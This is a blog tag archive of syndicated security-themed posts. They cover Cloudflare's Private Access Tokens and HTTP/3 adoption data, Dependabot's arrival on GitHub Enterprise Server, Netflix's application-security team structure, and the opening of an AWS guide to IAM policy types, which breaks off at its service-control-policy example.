Tag Archives: security

Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

Post Syndicated from Reid Tatoris original https://blog.cloudflare.com/eliminating-captchas-on-iphones-and-macs-using-new-standard/

Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

Today we’re announcing Private Access Tokens, a completely invisible, private way to validate that real users are visiting your site. Visitors using operating systems that support these tokens, including the upcoming versions of macOS or iOS, can now prove they’re human without completing a CAPTCHA or giving up personal data. This will eliminate nearly 100% of CAPTCHAs served to these users.

What does this mean for you?

If you’re an Internet user:

  • We’re making your mobile web experience more pleasant and more private than other networks at the same time.
  • You won’t see a CAPTCHA on a supported iOS or Mac device (other devices coming soon!) accessing the Cloudflare network.

If you’re a web or application developer:

  • Know your user is coming from an authentic device and signed application, verified by the device vendor directly.
  • Validate users without maintaining a cumbersome SDK.

If you’re a Cloudflare customer:

  • You don’t have to do anything!  Cloudflare will automatically ask for and utilize Private Access Tokens
  • Your visitors won’t see a CAPTCHA and we’ll ask for less data from their devices.

Introducing Private Access Tokens

Over the past year, Cloudflare has collaborated with Apple, Google, and other industry leaders to extend the Privacy Pass protocol with support for a new cryptographic token. These tokens simplify application security for developers and security teams, and obsolete legacy, third-party SDK based approaches to determining if a human is using a device. They work for browsers, APIs called by browsers, and APIs called within apps. We call these new tokens Private Access Tokens (PATs). This morning, Apple announced that PATs will be incorporated into iOS 16, iPad 16, and macOS 13, and we expect additional vendors to announce support in the near future.

Cloudflare has already incorporated PATs into our Managed Challenge platform, so any customer using this feature will automatically take advantage of this new technology to improve the browsing experience for supported devices.

Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

CAPTCHAs don’t work in mobile environments, PATs remove the need for them

We’ve written numerous times about how CAPTCHAs are a terrible user experience. However, we haven’t discussed specifically how much worse the user experience is on a mobile device. CAPTCHA as a technology was built and optimized for a browser-based world. They are deployed via a widget or iframe that is generally one size fits all, leading to rendering issues, or the input window only being partially visible on a device. The smaller real estate on mobile screens inherently makes the technology less accessible and solving any CAPTCHA more difficult, and the need to render JavaScript and image files slows down image loads while consuming excess customer bandwidth.

Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

Usability aside, mobile environments present an additional challenge in that they are increasingly API-driven. CAPTCHAs simply cannot work in an API environment where JavaScript can’t be rendered, or a WebView can’t be called. So, mobile app developers often have no easy option for challenging a user when necessary. They sometimes resort to using a clunky SDK to embed a CAPTCHA directly into an app. This requires work to embed and customize the CAPTCHA, continued maintenance and monitoring, and results in higher abandonment rates. For these reasons, when our customers choose to show a CAPTCHA today, it’s only shown on mobile 20% of the time.

We recently posted about how we used our Managed Challenge platform to reduce our CAPTCHA use by 91%. But because the CAPTCHA experience is so much worse on mobile, we’ve been separately working on ways we can specifically reduce CAPTCHA use on mobile even further.

When sites can’t challenge a visitor, they collect more data

So, you either can’t use CAPTCHA to protect an API, or the UX is too terrible to use on your mobile website. What options are left for confirming whether a visitor is real? A common one is to look at client-specific data, commonly known as fingerprinting.

You could ask for device IMEI and security patch versions, look at screen sizes or fonts, check for the presence of APIs that indicate human behavior, like interactive touch screen events and compare those to expected outcomes for the stated client. However, all of this data collection is expensive and, ultimately, not respectful of the end user. As a company that deeply cares about privacy and helping make the Internet better, we want to use as little data as possible without compromising the security of the services we provide.

Another alternative is to use system-level APIs that offer device validation checks. This includes DeviceCheck on Apple platforms and SafetyNet on Android. Application services can use these client APIs with their own services to assert that the clients they’re communicating with are valid devices. However, adopting these APIs requires both application and server changes, and can be just as difficult to maintain as SDKs.

Private Access Tokens vastly improve privacy by validating without fingerprinting

This is the most powerful aspect of PATs. By partnering with third parties like device manufacturers, who already have the data that would help us validate a device, we are able to abstract portions of the validation process, and confirm data without actually collecting, touching, or storing that data ourselves. Rather than interrogating a device directly, we ask the device vendor to do it for us.

In a traditional website setup, using the most common CAPTCHA provider:

  • The website you visit knows the URL, your IP, and some additional user agent data.
  • The CAPTCHA provider knows what website you visit, your IP, your device information, collects interaction data on the page, AND ties this data back to other sites where Google has seen you. This builds a profile of your browsing activity across both sites and devices, plus how you personally interact with a page.
Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

When PATs are used, device data is isolated and explicitly NOT exchanged between the involved parties (the manufacturer and the Cloudflare)

  • The website knows only your URL and IP, which it has to know to make a connection.
  • The device manufacturer (attester) knows only the device data required to attest your device, but can’t tell what website you visited, and doesn’t know your IP.
  • Cloudflare knows the site you visited, but doesn’t know any of your device or interaction information.
Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

We don’t actually need or want the underlying data that’s being collected for this process, we just want to verify if a visitor is faking their device or user agent. Private Access Tokens allow us to capture that validation state directly, without needing any of the underlying data. They allow us to be more confident in the authenticity of important signals, without having to look at those signals directly ourselves.

How Private Access Tokens compartmentalize data

With Private Access Tokens, four parties agree to work in concert with a common framework to generate and exchange anonymous, unforgeable tokens. Without all four parties in the process, PATs won’t work.

  1. An Origin. A website, application, or API that receives requests from a client. When a website receives a request to their origin, the origin must know to look for and request a token from the client making the request. For Cloudflare customers, Cloudflare acts as the origin (on behalf of customers) and handles the requesting and processing of tokens.
  2. A Client. Whatever tool the visitor is using to attempt to access the Origin. This will usually be a web browser or mobile application. In our example, let’s say the client is a mobile Safari Browser.
  3. An Attester. The Attester is who the client asks to prove something (i.e that a mobile device has a valid IMEI) before a token can be issued. In our example below, the Attester is Apple, the device vendor. An Issuer. The issuer is the only one in the process that actually generates, or issues, a token. The Attester makes an API call to whatever Issuer the Origin has chosen to trust,  instructing the Issuer to produce a token. In our case, Cloudflare will also be the Issuer.
Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

In the example above, a visitor opens the Safari browser on their iPhone and tries to visit example.com.

  1. Since Example uses Cloudflare to host their Origin, Cloudflare will ask the browser for a token.
  2. Safari supports PATs, so it will make an API call to Apple’s Attester, asking them to attest.
  3. The Apple attester will check various device components, confirm they are valid, and then make an API call to the Cloudflare Issuer (since Cloudflare acting as an Origin chooses to use the Cloudflare Issuer).
  4. The Cloudflare Issuer generates a token, sends it to the browser, which in turn sends it to the origin.
  5. Cloudflare then receives the token, and uses it to determine that we don’t need to show this user a CAPTCHA.

This probably sounds a bit complicated, but the best part is that the website took no action in this process. Asking for a token, validation, token generation, passing, all takes place behind the scenes by third parties that are invisible to both the user and the website. By working together, Apple and Cloudflare have just made this request more secure, reduced the data passed back and forth, and prevented a user from having to see a CAPTCHA. And we’ve done it by both collecting and exchanging less user data than we would have in the past.

Most customers won’t have to do anything to utilize Private Access Tokens

To take advantage of PATs, all you have to do is choose Managed Challenge rather than Legacy CAPTCHA as a response option in a Firewall rule. More than 65% of Cloudflare customers are already doing this. Our Managed Challenge platform will automatically ask every request for a token, and when the client is compatible with Private Access Tokens, we’ll receive one. Any of your visitors using an iOS or macOS device will automatically start seeing fewer CAPTCHAs once they’ve upgraded their OS.

This is just step one for us. We are actively working to get other clients and device makers utilizing the PAT framework as well. Any time a new client begins utilizing the PAT framework, traffic coming to your site from that client will automatically start asking for tokens, and your visitors will automatically see fewer CAPTCHAs.

We will be incorporating PATs into other security products very soon. Stay tuned for some announcements in the near future.

One developer’s journey bringing Dependabot to GitHub Enterprise Server

Post Syndicated from Landon Grindheim original https://github.blog/2022-06-07-one-developers-journey-bringing-dependabot-to-github-enterprise-server/

If you’re like me, you’re still excited by last week’s news that Dependabot is generally available on GitHub Enterprise Server (GHES). Developers using GHES can now let Dependabot secure their dependencies and keep them up-to-date. You know who would have loved that? Me at my last job.

Before joining GitHub, I spent five years working on teams that relied on GHES to host our code. As a GHES user, I really, really wanted Dependabot. Here’s why.

🤕 Dependencies

One constant pain point for my previous teams was staying on top of dependencies. Creating a Rails project with rails new results in an app with 74 dependencies, Django apps start with 88 dependencies, and a project initialized with Create React App will have 1,432 dependencies!

Unfortunately, security vulnerabilities happen, and they can expose your customers to existential risk, so it’s important they are handled as soon as they’re published.

As I’m most familiar with the Ruby ecosystem, I’ll use Nokogiri, a gem for parsing XML and HTML, to illustrate the process of manually resolving a vulnerability. Nokogiri has been a dependency of every Rails app I’ve maintained. It’s also seen seven vulnerabilities since 2019. To fix these manually, we’ve had to:

  • Clone `my_rails_app`
  • Track down and parse the Nokogiri release notes
  • Patch Nokogiri in `my_rails_app` to a non-vulnerable version
  • Push the changes and open a pull request
  • Wait for CI to pass
  • Get the necessary reviews
  • Deploy, observe, and merge

This is just one of (at least) 74 dependencies in one Rails app. My team maintained 14 Rails apps in our microservices-based architecture, so we needed to repeat the process for each app. A single vulnerability would eat up days of engineering time. That’s just one dependency in one ecosystem. We also worked on apps written in Elixir, Python, JavaScript, and PHP.

If an engineer was patching vulnerabilities, they couldn’t pursue feature work, the thing our customers could actually see. This would, understandably, lead to conversations about which vulnerabilities were most likely to be exploited and which we could tolerate for now.

If we had Dependabot security updates, that process would have started with a pull request. What took an engineer days to complete on their own could have been done before lunch.

We could have invested in keeping all of our dependencies up-to-date. Incremental upgrades are typically easier to perform and pose less risk. They also give bad actors less time to find and exploit vulnerabilities. One of my previous teams was still running Rails 3.2, which was no longer maintained when Rails 6 was released six years later. As support phased out, we had to apply our own security patches to our codebase instead of getting them from the framework. This made upgrading even harder. We spent years trying to get to a supported version, but other product priorities always won out.

If my team had Dependabot version updates, Dependabot would have opened pull requests each time a new version of Rails was released. We’d still need to make changes to ensure our apps were compliant with the new versions, but the changes would be made incrementally, making the lift much lighter. But we didn’t have Dependabot. We had to upgrade manually, and that meant upgrading didn’t happen until it became a P0.

A new home

I joined GitHub in 2021 to work on Dependabot. Being intimately familiar with the challenges Dependabot could help address, I wanted to be part of the solution. Little did I know, the team was just starting the process of bringing Dependabot to GHES. Call it serendipity, a dream come true, or tea leaves arranged just so.

I quickly realized why Dependabot wasn’t already on GHES. GitHub acquired Dependabot in 2019, and it took some time to scale Dependabot to be able to secure GitHub’s millions of repositories. To achieve this, we ported the service’s backend to run on Moda, GitHub’s internal Kubernetes-based platform. The dependency update jobs that result in pull requests were updated to run on lightweight Firecracker VMs, allowing Dependabot to create millions of pull requests in just hours. It was an impressive effort by a small team.

That effort, however, didn’t lend itself to the architecture of GHES, where everything runs on a single server with limited resources. An auto-scaling backend and network of VMs wasn’t an option. Instead, we needed to port Dependabot’s backend to run on Nomad, the container orchestration option on GHES. The jobs running on Firecracker VMs needed to run on our customers’ hardware. Fortunately, organizations can self-host GitHub Actions runners in GHES, so we adapted them to run on GitHub Actions. We also had to adjust our development processes to support continuous delivery in the cloud and less frequent GHES releases.

The result is that developers relying on GHES now have the option to have their dependencies updated for them. Now, my former teammates can update their dependencies by:

  • Viewing the already opened pull request
  • Reviewing the pull request and the included release notes
  • Deploying, observing, and merging

We’re really proud of that. As for me, I get the immense satisfaction of knowing that I built something that will directly benefit my former teammates. It doesn’t get much better than that!

Guess what? GitHub is hiring. What would you like to make better?

If you’re inspired to work at GitHub, we’d love for you to join us. Check out our Careers page to see all of our current job openings.

  • Dedicated remote-first company with flexible hours
  • Building great products used by tens of millions of people and companies around the world
  • Committed to nurturing a diverse and inclusive workplace
  • And so much more!

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

Post Syndicated from Lucas Pardue original https://blog.cloudflare.com/cloudflare-view-http3-usage/

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

Today, a cluster of Internet standards were published that rationalize and modernize the definition of HTTP – the application protocol that underpins the web. This work includes updates to, and refactoring of, HTTP semantics, HTTP caching, HTTP/1.1, HTTP/2, and the brand-new HTTP/3. Developing these specifications has been no mean feat and today marks the culmination of efforts far and wide, in the Internet Engineering Task Force (IETF) and beyond. We thought it would be interesting to celebrate the occasion by sharing some analysis of Cloudflare’s view of HTTP traffic over the last 12 months.

However, before we get into the traffic data, for quick reference, here are the new RFCs that you should make a note of and start using:

  • HTTP Semantics – RFC 9110
    • HTTP’s overall architecture, common terminology and shared protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, representation data, content codings and much more. Obsoletes RFCs 2818, 7231, 7232, 7233, 7235, 7538, 7615, 7694, and portions of 7230.
  • HTTP Caching – RFC 9111
    • HTTP caches and related header fields to control the behavior of response caching. Obsoletes RFC 7234.
  • HTTP/1.1 – RFC 9112
    • A syntax, aka "wire format", of HTTP that uses a text-based format. Typically used over TCP and TLS. Obsolete portions of RFC 7230.
  • HTTP/2 – RFC 9113
    • A syntax of HTTP that uses a binary framing format, which provides streams to support concurrent requests and responses. Message fields can be compressed using HPACK. Typically used over TCP and TLS. Obsoletes RFCs 7540 and 8740.
  • HTTP/3 – RFC 9114
    • A syntax of HTTP that uses a binary framing format optimized for the QUIC transport protocol. Message fields can be compressed using QPACK.
  • QPACK – RFC 9204
    • A variation of HPACK field compression that is optimized for the QUIC transport protocol.

On May 28, 2021, we enabled QUIC version 1 and HTTP/3 for all Cloudflare customers, using the final “h3” identifier that matches RFC 9114. So although today’s publication is an occasion to celebrate, for us nothing much has changed, and it’s business as usual.

Support for HTTP/3 in the stable release channels of major browsers came in November 2020 for Google Chrome and Microsoft Edge and April 2021 for Mozilla Firefox. In Apple Safari, HTTP/3 support currently needs to be enabled in the “Experimental Features” developer menu in production releases.

A browser and web server typically automatically negotiate the highest HTTP version available. Thus, HTTP/3 takes precedence over HTTP/2. We looked back over the last year to understand HTTP/3 usage trends across the Cloudflare network, as well as analyzing HTTP versions used by traffic from leading browser families (Google Chrome, Mozilla Firefox, Microsoft Edge, and Apple Safari), major search engine indexing bots, and bots associated with some popular social media platforms. The graphs below are based on aggregate HTTP(S) traffic seen globally by the Cloudflare network, and include requests for website and application content across the Cloudflare customer base between May 7, 2021, and May 7, 2022. We used Cloudflare bot scores to restrict analysis to “likely human” traffic for the browsers, and to “likely automated” and “automated” for the search and social bots.

Traffic by HTTP version

Overall, HTTP/2 still comprises the majority of the request traffic for Cloudflare customer content, as clearly seen in the graph below. After remaining fairly consistent through 2021, HTTP/2 request volume increased by approximately 20% heading into 2022. HTTP/1.1 request traffic remained fairly flat over the year, aside from a slight drop in early December. And while HTTP/3 traffic initially trailed HTTP/1.1, it surpassed it in early July, growing steadily and  roughly doubling in twelve months.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

HTTP/3 traffic by browser

Digging into just HTTP/3 traffic, the graph below shows the trend in daily aggregate request volume over the last year for HTTP/3 requests made by the surveyed browser families. Google Chrome (orange line) is far and away the leading browser, with request volume far outpacing the others.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

Below, we remove Chrome from the graph to allow us to more clearly see the trending across other browsers. Likely because it is also based on the Chromium engine, the trend for Microsoft Edge closely mirrors Chrome. As noted above, Mozilla Firefox first enabled production support in version 88 in April 2021, making it available by default by the end of May. The increased adoption of that updated version during the following month is clear in the graph as well, as HTTP/3 request volume from Firefox grew rapidly. HTTP/3 traffic from Apple Safari increased gradually through April, suggesting growth in the number of users enabling the experimental feature or running a Technology Preview version of the browser. However, Safari’s HTTP/3 traffic has subsequently dropped over the last couple of months. We are not aware of any specific reasons for this decline, but our most recent observations indicate HTTP/3 traffic is recovering.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

Looking at the lines in the graph for Chrome, Edge, and Firefox, a weekly cycle is clearly visible in the graph, suggesting greater usage of these browsers during the work week. This same pattern is absent from Safari usage.

Across the surveyed browsers, Chrome ultimately accounts for approximately 80% of the HTTP/3 requests seen by Cloudflare, as illustrated in the graphs below. Edge is responsible for around another 10%, with Firefox just under 10%, and Safari responsible for the balance.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends
HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

We also wanted to look at how the mix of HTTP versions has changed over the last year across each of the leading browsers. Although the percentages vary between browsers, it is interesting to note that the trends are very similar across Chrome, Firefox and Edge. (After Firefox turned on default HTTP/3 support in May 2021, of course.)  These trends are largely customer-driven – that is, they are likely due to changes in Cloudflare customer configurations.

Most notably we see an increase in HTTP/3 during the last week of September, and a decrease in HTTP/1.1 at the beginning of December. For Safari, the HTTP/1.1 drop in December is also visible, but the HTTP/3 increase in September is not. We expect that over time, once Safari supports HTTP/3 by default that its trends will become more similar to those seen for the other browsers.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends
HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends
HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends
HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

Traffic by search indexing bot

Back in 2014, Google announced that it would start to consider HTTPS usage as a ranking signal as it indexed websites. However, it does not appear that Google, or any of the other major search engines, currently consider support for the latest versions of HTTP as a ranking signal. (At least not directly – the performance improvements associated with newer versions of HTTP could theoretically influence rankings.) Given that, we wanted to understand which versions of HTTP the indexing bots themselves were using.

Despite leading the charge around the development of QUIC, and integrating HTTP/3 support into the Chrome browser early on, it appears that on the indexing/crawling side, Google still has quite a long way to go. The graph below shows that requests from GoogleBot are still predominantly being made over HTTP/1.1, although use of HTTP/2 has grown over the last six months, gradually approaching HTTP/1.1 request volume. (A blog post from Google provides some potential insights into this shift.) Unfortunately, the volume of requests from GoogleBot over HTTP/3 has remained extremely limited over the last year.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

Microsoft’s BingBot also fails to use HTTP/3 when indexing sites, with near-zero request volume. However, in contrast to GoogleBot, BingBot prefers to use HTTP/2, with a wide margin developing in mid-May 2021 and remaining consistent across the rest of the past year.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

Traffic by social media bot

Major social media platforms use custom bots to retrieve metadata for shared content, improve language models for speech recognition technology, or otherwise index website content. We also surveyed the HTTP version preferences of the bots deployed by three of the leading social media platforms.

Although Facebook supports HTTP/3 on their main website (and presumably their mobile applications as well), their back-end FacebookBot crawler does not appear to support it. Over the last year, on the order of 60% of the requests from FacebookBot have been over HTTP/1.1, with the balance over HTTP/2. Heading into 2022, it appeared that HTTP/1.1 preference was trending lower, with request volume over the 25-year-old protocol dropping from near 80% to just under 50% during the fourth quarter. However, that trend was abruptly reversed, with HTTP/1.1 growing back to over 70% in early February. The reason for the reversal is unclear.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

Similar to FacebookBot, it appears TwitterBot’s use of HTTP/3 is, unfortunately, pretty much non-existent. However, TwitterBot clearly has a strong and consistent preference for HTTP/2, accounting for 75-80% of its requests, with the balance over HTTP/1.1.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends

In contrast, LinkedInBot has, over the last year, been firmly committed to making requests over HTTP/1.1, aside from the apparently brief anomalous usage of HTTP/2 last June. However, in mid-March, it appeared to tentatively start exploring the use of other HTTP versions, with around 5% of requests now being made over HTTP/2, and around 1% over HTTP/3, as seen in the upper right corner of the graph below.

HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends


We’re happy that HTTP/3 has, at long last, been published as RFC 9114. More than that, we’re super pleased to see that regardless of the wait, browsers have steadily been enabling support for the protocol by default. This allows end users to seamlessly gain the advantages of HTTP/3 whenever it is available. On Cloudflare’s global network, we’ve seen continued growth in the share of traffic speaking HTTP/3, demonstrating continued interest from customers in enabling it for their sites and services. In contrast, we are disappointed to see bots from the major search and social platforms continuing to rely on aging versions of HTTP. We’d like to build a better understanding of how these platforms chose particular HTTP versions and welcome collaboration in exploring the advantages that HTTP/3, in particular, could provide.

Current statistics on HTTP/3 and QUIC adoption at a country and autonomous system (ASN) level can be found on Cloudflare Radar.

Running HTTP/3 and QUIC on the edge for everyone has allowed us to monitor a wide range of aspects related to interoperability and performance across the Internet. Stay tuned for future blog posts that explore some of the technical developments we’ve been making.

And this certainly isn’t the end of protocol innovation, as HTTP/3 and QUIC provide many exciting new opportunities. The IETF and wider community are already underway building new capabilities on top, such as MASQUE and WebTransport. Meanwhile, in the last year, the QUIC Working Group has adopted new work such as QUIC version 2, and the Multipath Extension to QUIC.

Scaling Appsec at Netflix (Part 2)

Post Syndicated from Netflix Technology Blog original https://netflixtechblog.com/scaling-appsec-at-netflix-part-2-c9e0f1488bc5

By Astha Singhal, Lakshmi Sudheer, Julia Knecht

The Application Security teams at Netflix are responsible for securing the software footprint that we create to run the Netflix product, the Netflix studio, and the business. Our customers are product and engineering teams at Netflix that build these software services and platforms. The Netflix cultural values of ‘Context not Control’ and ‘Freedom and Responsibility’ strongly influence how we do Security at Netflix. Our goal is to manage security risks to Netflix via clear, opinionated security guidance, and by providing risk context to Netflix engineering teams to make pragmatic risk decisions at scale.

A few years ago, we published this blog post about how we had organized our team to focus our bandwidth on scalable investments as opposed to just traditional Appsec functions, which were not scaling well in our rapidly growing environment. We leaned into the idea of strategic security partnerships and automation investments to create more leverage for application security. This became the foundation for our current org structure with teams focused on Appsec Partnerships and Appsec Engineering. In this operating model, we provided critical Appsec operational services to Netflix — including bug bounty, pentesting, PSIRT (product security incident response), security reviews, and developer security education — via a shared on-call rotation.

Team Structure v1

Over the past few years, this model has allowed us to focus on investments like Secure by Default for baseline security controls, Security Self-Service for clear actionable guidance and Vulnerability Scanning at scale for software supply chain security. We wanted to share an update on learnings from this model, how our needs have evolved, and where we expect to go from here.

Among the most notable wins, we have been able to utilize this scale focused approach to productize application security for our rapidly growing studio engineering ecosystem, standardize security baseline for all Enterprise apps, and build paved roads to provide Secure by Default Authentication & Authorization capabilities for central data engineering tools. Our focus has been on improving overall security assurance as opposed to just vulnerability prevention. We are now expanding this approach to more parts of our ecosystem. This mindset has also allowed us to invest our capacity for white-glove service towards reasonable residual risk and standard guidance so we can reduce the need for white-glove engagements in the long term (e.g., investment in an API proxy that provides baseline security controls for free as opposed to pentesting all applications that would eventually sit behind that API proxy). This approach has also allowed us to build strong relationships with central engineering teams at Netflix (Data Platform, Developer Tools, Cloud Infrastructure, IAM Product Engineering) that will continue to serve as central points of leverage for security in the long term.

However, it has not been all sunshine and rainbows. On the partnership side, the bespoke nature of each partnership means that there isn’t consistency and redundancy built into the operating model and the related partnership artifacts (e.g., Security Strategy and Roadmap, Threat Model, Deliverable Tracking, Residual Risk Criteria, etc). This leads to insufficient context sharing and high operational churn every time we have personnel changes. The partnership charter has also grown laterally into the infrastructure space as we stack our leverage bets on infrastructure components (like Service Mesh, Container Platform, etc). The skill sets and domain depth in those partnerships has further diversified the skills on the team. But this is a tradeoff on our ability to serve generalized Appsec oncall needs like bug bounty triage with high consistency. Given that partnerships focus on long-running strategic initiatives, the wins can be few and far between and that can be difficult for team motivation. We also found various areas in which security partnership work bleeds into security product solutioning and it can be difficult to identify the appropriate handoff points.

Additionally, as the complexity of our ecosystem grows, the goal of “single PoC into information security” becomes increasingly more difficult to maintain. The team is now investing in consistency and scalability of partnership artifacts and communication channels, better redundancy and context sharing on the team through squad operating models, crisper engagement criteria, and definition of done for partnership engagements.

Our Appsec Engineering team builds products to help us scale, e.g.: a dynamic Asset Inventory that understands the nuances of our bespoke engineering ecosystem and how our applications and data relate to each other. This has evolved their identity to be a software engineering team that focuses on security problems as opposed to a security engineering team that writes code/software. Our hiring has reflected that shift, and we’ve added more dedicated software engineers (SWEs) to the team to help us build out software. With this shift, we’ve incorporated engineering best practices, and our products have appropriate investments toward reliability and sustainability. As the team skews towards more software engineering focused talent, ramping up to support the shared Appsec-focused on-call has been challenging.

While originally built to support AppSec use cases around providing guidance to developers in a self-service way, interest in the rich data and relationships we have in our tools, especially our Asset Inventory, has grown. As a result, we’ve continued to invest in making our solutions scalable and accessible, so security engineers can get the data they need more easily to drive security use cases. We’ve also discovered, through interviews with engineers, that self-service guidance doesn’t stand on its own. Moving forward, the team is investing in understanding our customer use cases better, and shifting our self-service story toward higher-context, more opinionated automated guidance to ensure developers have everything they need to make truly informed decisions about the security of their applications (similar to how they might make resiliency or other product decisions).

As the Netflix business and engineering workforce has grown, our software footprint has also grown and become more heterogeneous. At the same time, partnerships have grown more and more strategic, and engineering has grown more and more software-focused. As our team specialized, what emerged was a loss of strategic focus for our AppSec Professional Services charter. These services now need more dedicated strategic investment as the volume and support needs have grown. So, we are now building out a dedicated capability focused on these critical services that are important investments to be made and can no longer be served effectively via a shared Appsec on-call. This will be our “Appsec Reviews and Assessments” function and we are hiring for passionate, early career Appsec engineers to join this group.

Team Structure v2

We will continue to learn as we go through this next phase of evolution of our program. We hope to continue to share these learnings with the broader community interested in scalable product and application security.

Scaling Appsec at Netflix (Part 2) was originally published in Netflix TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

IAM policy types: How and when to use them

Post Syndicated from Matt Luttrell original https://aws.amazon.com/blogs/security/iam-policy-types-how-and-when-to-use-them/

You manage access in AWS by creating policies and attaching them to AWS Identity and Access Management (IAM) principals (roles, users, or groups of users) or AWS resources. AWS evaluates these policies when an IAM principal makes a request, such as uploading an object to an Amazon Simple Storage Service (Amazon S3) bucket. Permissions in the policies determine whether the request is allowed or denied.

In this blog post, we will walk you through a scenario and explain when you should use which policy type, and who should own and manage the policy. You will learn when to use the more common policy types: identity-based policies, resource-based policies, permissions boundaries, and AWS Organizations service control policies (SCPs).

Different policy types and when to use them

AWS has different policy types that provide you with powerful flexibility, and it’s important to know how and when to use each policy type. It’s also important for you to understand how to structure your IAM policy ownership to avoid a centralized team from becoming a bottleneck. Explicit policy ownership can allow your teams to move more quickly, while staying within the secure guardrails that are defined centrally.

Service control policies overview

Service control policies (SCPs) are a feature of AWS Organizations. AWS Organizations is a service for grouping and centrally managing the AWS accounts that your business owns. SCPs are policies that specify the maximum permissions for an organization, organizational unit (OU), or an individual account. An SCP can limit permissions for principals in member accounts, including the AWS account root user.

SCPs are meant to be used as coarse-grained guardrails, and they don’t directly grant access. The primary function of SCPs is to enforce security invariants across AWS accounts and OUs in an organization. Security invariants are control objectives or configurations that you apply to multiple accounts, OUs, or the whole AWS organization. For example, you can use an SCP to prevent member accounts from leaving your organization or to enforce that AWS resources can only be deployed to certain Regions.

Permissions boundaries overview

Permissions boundaries are an advanced IAM feature in which you set the maximum permissions that an identity-based policy can grant to an IAM principal. When you set a permissions boundary for a principal, the principal can perform only the actions that are allowed by both its identity-based policies and its permissions boundaries.

A permissions boundary is a type of identity-based policy that doesn’t directly grant access. Instead, like an SCP, a permissions boundary acts as a guardrail for your IAM principals that allows you to set coarse-grained access controls. A permissions boundary is typically used to delegate the creation of IAM principals. Delegation enables other individuals in your accounts to create new IAM principals, but limits the permissions that can be granted to the new IAM principals.

Identity-based policies overview

Identity-based policies are policy documents that you attach to a principal (roles, users, and groups of users) to control what actions a principal can perform, on which resources, and under what conditions. Identity-based policies can be further categorized into AWS managed policies, customer managed policies, and inline policies. AWS managed policies are reusable identity-based policies that are created and managed by AWS. You can use AWS managed policies as a starting point for building your own identity-based policies that are specific to your organization. Customer managed policies are reusable identity-based policies that can be attached to multiple identities. Customer managed policies are useful when you have multiple principals with identical access requirements. Inline policies are identity-based policies that are attached to a single principal. Use inline-policies when you want to create least-privilege permissions that are specific to a particular principal.

You will have many identity-based policies in your AWS account that are used to enable access in scenarios such as human access, application access, machine learning workloads, and deployment pipelines. These policies should be fine-grained. You use these policies to directly apply least privilege permissions to your IAM principals. You should write the policies with permissions for the specific task that the principal needs to accomplish.

Resource-based policies overview

Resource-based policies are policy documents that you attach to a resource such as an S3 bucket. These policies grant the specified principal permission to perform specific actions on that resource and define under what conditions this permission applies. Resource-based policies are inline policies. For a list of AWS services that support resource-based policies, see AWS services that work with IAM.

Resource-based policies are optional for many workloads that don’t span multiple AWS accounts. Fine-grained access within a single AWS account is typically granted with identity-based policies. AWS Key Management Service (AWS KMS) keys and IAM role trust policies are two exceptions, and both of these resources must have a resource-based policy even when the principal and the KMS key or IAM role are in the same account. IAM roles and KMS keys behave this way as an extra layer of protection that requires the owner of the resource (key or role) to explicitly allow or deny principals from using the resource. For other resources that support resource-based policies, here are some use cases where they are most commonly used:

  1. Granting cross-account access to your AWS resource.
  2. Granting an AWS service access to your resource when the AWS service uses an AWS service principal. For example, when using AWS CloudTrail, you must explicitly grant the CloudTrail service principal access to write files to an Amazon S3 bucket.
  3. Applying broad access guardrails to your AWS resources. You can see some examples in the blog post IAM makes it easier for you to manage permissions for AWS services accessing your resources.
  4. Applying an additional layer of protection for resources that store sensitive data, such as AWS Secrets Manager secrets or an S3 bucket with sensitive data. You can use a resource-based policy to deny access to IAM principals that shouldn’t have access to sensitive data, even if granted access by an identity-based policy. An explicit deny in an IAM policy always overrides an allow.

How to implement different policy types

In this section, we will walk you through an example of a design that includes all four of the policy types explained in this post.

The example that follows shows an application that runs on an Amazon Elastic Compute Cloud (Amazon EC2) instance and needs to read from and write files to an S3 bucket in the same account. The application also reads (but doesn’t write) files from an S3 bucket in a different account. The company in this example, Example Corp, uses a multi-account strategy, and each application has its own AWS account. The architecture of the application is shown in Figure 1.

Figure 1: Sample application architecture that needs to access S3 buckets in two different AWS accounts

Figure 1: Sample application architecture that needs to access S3 buckets in two different AWS accounts

There are three teams that participate in this example: the Central Cloud Team, the Application Team, and the Data Lake Team. The Central Cloud Team is responsible for the overall security and governance of the AWS environment across all AWS accounts at Example Corp. The Application Team is responsible for building, deploying, and running their application within the application account (111111111111) that they own and manage. Likewise, the Data Lake Team owns and manages the data lake account (222222222222) that hosts a data lake at Example Corp.

With that background in mind, we will walk you through an implementation for each of the four policy types and include an explanation of which team we recommend own each policy. The policy owner is the team that is responsible for creating and maintaining the policy.

Service control policies

The Central Cloud Team owns the implementation of the security controls that should apply broadly to all of Example Corp’s AWS accounts. At Example Corp, the Central Cloud Team has two security requirements that they want to apply to all accounts in their organization:

  1. All AWS API calls must be encrypted in transit.
  2. Accounts can’t leave the organization on their own.

